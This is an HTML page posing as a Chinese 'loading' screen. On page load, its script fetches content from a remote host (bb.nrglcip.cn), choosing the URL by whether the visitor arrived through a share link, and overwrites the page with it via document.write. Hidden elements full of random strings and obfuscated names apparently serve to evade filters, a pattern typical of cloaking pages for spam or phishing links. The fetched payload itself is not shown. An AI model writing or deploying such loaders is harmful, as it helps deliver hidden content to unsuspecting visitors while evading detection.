<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .L58t9T {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .L58t9T .unsKpXE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .L58t9T .content {
            line-height: 50px;
            text-align: center
        }

        .L58t9T .img {
            width: 100%
        }

        .L58t9T .T3sGgu0OoKF {
            text-align: center
        }

        .L58t9T .T3sGgu0OoKF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .L58t9T .T3sGgu0OoKF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .L58t9T .T3sGgu0OoKF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .L58t9T .T3sGgu0OoKF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .L58t9T .T3sGgu0OoKF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .L58t9T .T3sGgu0OoKF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .L58t9T .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zmczzdbJJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gYj2ew7 = zmczzdbJJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gYj2ew7 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gYj2ew7 +".html?a=share";
		}
		
        GmwM9rwe=url+"#"+new Date().getTime();
        GmwM9rwe && function() {
            $.get(GmwM9rwe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >DSiVHjzt2WMQkSMQENRX3GbGyxmy9vIRvsOxo1KvAf486tN3XIJQ1RKkwCcJg8o8TiphOZhYLKwGnl</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >hzJvOopM2hquzBNBPHkke3f8orU7Oj</h1>
<span style='display:none'>LO9zKNx3qMqguuNzVpN9Tx47eYpYVSrK600DmPzd3C05waSTX</span>
<ul style='display:none' >DSiVHjzt2WMQkSMQENRX3GbGyxmy9vIRvsOxo1KvAf486tN3XIJQ1RKkwCcJg8o8TiphOZhYLKwGnl</ul>
<li style='display:none' >cfgWBxs0kHOTB7axg5a4fRWGWmkONsZwvyc4RWukLO7hcoLHgVZzbkuN</li><div class="L58t9T">
    <div class="unsKpXE">
        <div class="T3sGgu0OoKF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>bApcxGwnj3h0dY1c</div>
<h1 style='display:none' >guKAfyiLDCpe2udvus6uAYhXYdcQHTOv1SDzDpLEuFIioR46HTZebyaUCWCMnBBNT21Afne</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >guKAfyiLDCpe2udvus6uAYhXYdcQHTOv1SDzDpLEuFIioR46HTZebyaUCWCMnBBNT21Afne</h1>
<h1 style='display:none' >guKAfyiLDCpe2udvus6uAYhXYdcQHTOv1SDzDpLEuFIioR46HTZebyaUCWCMnBBNT21Afne</h1>
<img  src='' style='display:none'>
<li style='display:none' >BAQApHAlJpGTZGyGAkNMRFPPHVrgF70ZjWKIRiDtNiY8</li>
<img  src='' style='display:none'></body>
</html>